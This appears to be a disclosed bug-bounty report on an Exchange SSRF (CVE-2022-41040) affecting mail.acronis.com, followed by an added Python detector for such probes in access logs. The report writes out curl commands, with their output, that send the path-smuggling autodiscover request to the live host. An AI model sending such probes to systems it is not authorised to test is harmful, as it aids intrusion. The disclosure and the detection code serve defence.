mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040

Disclosed: 2022-10-13 17:12:43 By bbece5b1ea2cbb33d0690ad To acronis
Critical
Vulnerability Details
Hello Acronis team,

Please run

```
curl -ksL -m5 -o /dev/null -I -w "%{http_code}" "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync"
curl -ksL -m5 "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" | grep Protocol
```

and get the following output:

```
404
{"Protocol":"ActiveSync","Url":"https://eas.outlook.com/Microsoft-Server-ActiveSync"}
```

proving that mail.acronis.com is vulnerable to CVE-2022-41040. PoC video attached.

## Impact

SSRF can be used for unauthorized actions or access to confidential data.
Report Stats
  • Report ID: 1719719
  • State: Closed
  • Substate: resolved
  • Upvotes: 70
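The report above checks exposure by sending an autodiscover request whose `Email` parameter carries an embedded `autodiscover/autodiscover.json@...` path. From the defender's side, the same pattern is what to look for in web server access logs. The following is an added example, not part of the report or of any Acronis or Microsoft tooling: it parses a few constructed log lines in a simplified W3C/IIS layout (date, time, client IP, method, URI stem, query, status; hosts and addresses are made up) and flags `autodiscover.json` requests whose `Email` value smuggles a path before the `@`, regardless of the `Protocol` value requested.

```python
"""Flag CVE-2022-41040-style autodiscover probes in access logs (added example)."""
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed sample lines (simplified W3C/IIS layout):
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2022-10-13 17:10:01 203.0.113.10 GET /autodiscover/autodiscover.json Email=autodiscover/autodiscover.json%40example.com&Protocol=ActiveSync 404
2022-10-13 17:10:02 198.51.100.7 GET /autodiscover/autodiscover.json Email=alice%40example.com&Protocol=ActiveSync 200
2022-10-13 17:10:03 203.0.113.10 GET /owa/ - 200
2022-10-13 17:10:04 203.0.113.11 POST /Autodiscover/Autodiscover.json Email=AUTODISCOVER/autodiscover.json@example.com&Protocol=Powershell 200
"""

AUTODISCOVER_STEM = "/autodiscover/autodiscover.json"


def is_probe_email(email: str) -> bool:
    """True when the part before '@' carries a path rather than a mailbox name.

    A legitimate Autodiscover lookup sends a plain address; the probe form
    embeds 'autodiscover/autodiscover.json' (or any '/') in the local part.
    """
    local, sep, _domain = email.partition("@")
    if not sep:
        return False
    return "/" in local or "autodiscover.json" in local.lower()


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into named fields; None if the line is malformed."""
    parts = line.split(maxsplit=6)
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": query, "status": status}


def find_autodiscover_probes(log_text: str) -> List[Dict[str, object]]:
    """Return one hit per autodiscover request with a path-smuggling Email value."""
    hits: List[Dict[str, object]] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["stem"].lower() != AUTODISCOVER_STEM:
            continue
        # IIS writes '-' for an empty query; parse_qs also decodes %40 -> '@'.
        query = "" if rec["query"] == "-" else rec["query"]
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        for email in params.get("email", []):
            if is_probe_email(email):
                hits.append({
                    "timestamp": f'{rec["date"]} {rec["time"]}',
                    "client_ip": rec["ip"],
                    "method": rec["method"],
                    "email": email,
                    "protocol": params.get("protocol", ["?"])[0],
                    "status": int(rec["status"]),
                })
    return hits


if __name__ == "__main__":
    for hit in find_autodiscover_probes(SAMPLE_LOG):
        print(hit)
```

The match is keyed on the `Email` value, not on the response code: the report's own probe got a `404` from the first request and still demonstrated the issue, so a status filter would hide exactly the traffic of interest. Normal client lookups (the `alice@example.com` line) are not flagged.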